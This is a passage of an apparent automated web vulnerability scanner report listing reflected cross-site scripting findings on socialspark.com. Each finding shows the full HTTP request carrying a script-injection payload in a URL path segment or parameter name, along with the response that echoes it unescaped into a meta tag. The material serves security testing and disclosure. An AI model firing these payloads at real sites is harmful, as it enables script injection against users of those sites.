Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.3.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341fe39c\"><script>alert(1)</script>8dc8f0fd0c0/claimdot.gif"/>
...[SNIP]...

1.142. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72675"><script>alert(1)</script>018af913705 was submitted in the REST URL parameter 3. This input was echoed as 72675\"><script>alert(1)</script>018af913705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif72675"><script>alert(1)</script>018af913705 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.3.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif72675\"><script>alert(1)</script>018af913705"/>
...[SNIP]...

1.143. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55c7"><script>alert(1)</script>d059477d027 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b55c7\"><script>alert(1)</script>d059477d027 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif?b55c7"><script>alert(1)</script>d059477d027=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.3.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif?b55c7\"><script>alert(1)</script>d059477d027=1"/>
...[SNIP]...

1.144. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21dfa"><script>alert(1)</script>98630b4c29a was submitted in the REST URL parameter 1. This input was echoed as 21dfa\"><script>alert(1)</script>98630b4c29a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C21dfa"><script>alert(1)</script>98630b4c29a/script%3Eb4a78946341/claimdot.gif HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.2.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C21dfa\"><script>alert(1)</script>98630b4c29a/script%3Eb4a78946341/claimdot.gif"/>
...[SNIP]...

1.145. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eefe3"><script>alert(1)</script>aa44f5f9423 was submitted in the REST URL parameter 2. This input was echoed as eefe3\"><script>alert(1)</script>aa44f5f9423 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341eefe3"><script>alert(1)</script>aa44f5f9423/claimdot.gif HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.2.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341eefe3\"><script>alert(1)</script>aa44f5f9423/claimdot.gif"/>
...[SNIP]...

1.146. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add90"><script>alert(1)</script>b805c8d363e was submitted in the REST URL parameter 3. This input was echoed as add90\"><script>alert(1)</script>b805c8d363e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gifadd90"><script>alert(1)</script>b805c8d363e HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.2.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gifadd90\"><script>alert(1)</script>b805c8d363e"/>
...[SNIP]...

1.147. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7815e"><script>alert(1)</script>b1f5e66a87d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7815e\"><script>alert(1)</script>b1f5e66a87d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif?7815e"><script>alert(1)</script>b1f5e66a87d=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.2.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(10x0024)%3C/script%3Eb4a78946341/claimdot.gif?7815e\"><script>alert(1)</script>b1f5e66a87d=1"/>
...[SNIP]...

1.148. http://socialspark.com/javascripts/application.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/application.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86faf"><script>alert(1)</script>87095b8e08b was submitted in the REST URL parameter 1. This input was echoed as 86faf\"><script>alert(1)</script>87095b8e08b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts86faf"><script>alert(1)</script>87095b8e08b/application.js HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascripts86faf\"><script>alert(1)</script>87095b8e08b/application.js"/>
...[SNIP]...

1.149. http://socialspark.com/javascripts/application.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/application.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504ab"><script>alert(1)</script>57ef1ab5983 was submitted in the REST URL parameter 2. This input was echoed as 504ab\"><script>alert(1)</script>57ef1ab5983 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/application.js504ab"><script>alert(1)</script>57ef1ab5983 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascripts/application.js504ab\"><script>alert(1)</script>57ef1ab5983"/>
...[SNIP]...

1.150. http://socialspark.com/javascripts/application.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/application.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 140cf"><script>alert(1)</script>7244388dc86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 140cf\"><script>alert(1)</script>7244388dc86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/application.js?140cf"><script>alert(1)</script>7244388dc86=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:45:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:45:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascripts/application.js?140cf\"><script>alert(1)</script>7244388dc86=1"/>
...[SNIP]...

1.151. http://socialspark.com/javascripts/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb67"><script>alert(1)</script>c963a5eb61c was submitted in the REST URL parameter 1. This input was echoed as dcb67\"><script>alert(1)</script>c963a5eb61c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptsdcb67"><script>alert(1)</script>c963a5eb61c/jquery.js HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:45:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:45:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascriptsdcb67\"><script>alert(1)</script>c963a5eb61c/jquery.js"/>
...[SNIP]...

1.152. http://socialspark.com/javascripts/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c41"><script>alert(1)</script>fc87ce1383d was submitted in the REST URL parameter 2. This input was echoed as 84c41\"><script>alert(1)</script>fc87ce1383d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/jquery.js84c41"><script>alert(1)</script>fc87ce1383d HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/javascripts/jquery.js84c41\"><script>alert(1)</script>fc87ce1383d"/>
...[SNIP]...

1.153. http://socialspark.com/javascripts/jquery.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/javascripts/jquery.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d6d"><script>alert(1)</script>198557de060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26d6d\"><script>alert(1)</script>198557de060 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/jquery.js?26d6d"><script>alert(1)</script>198557de060=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
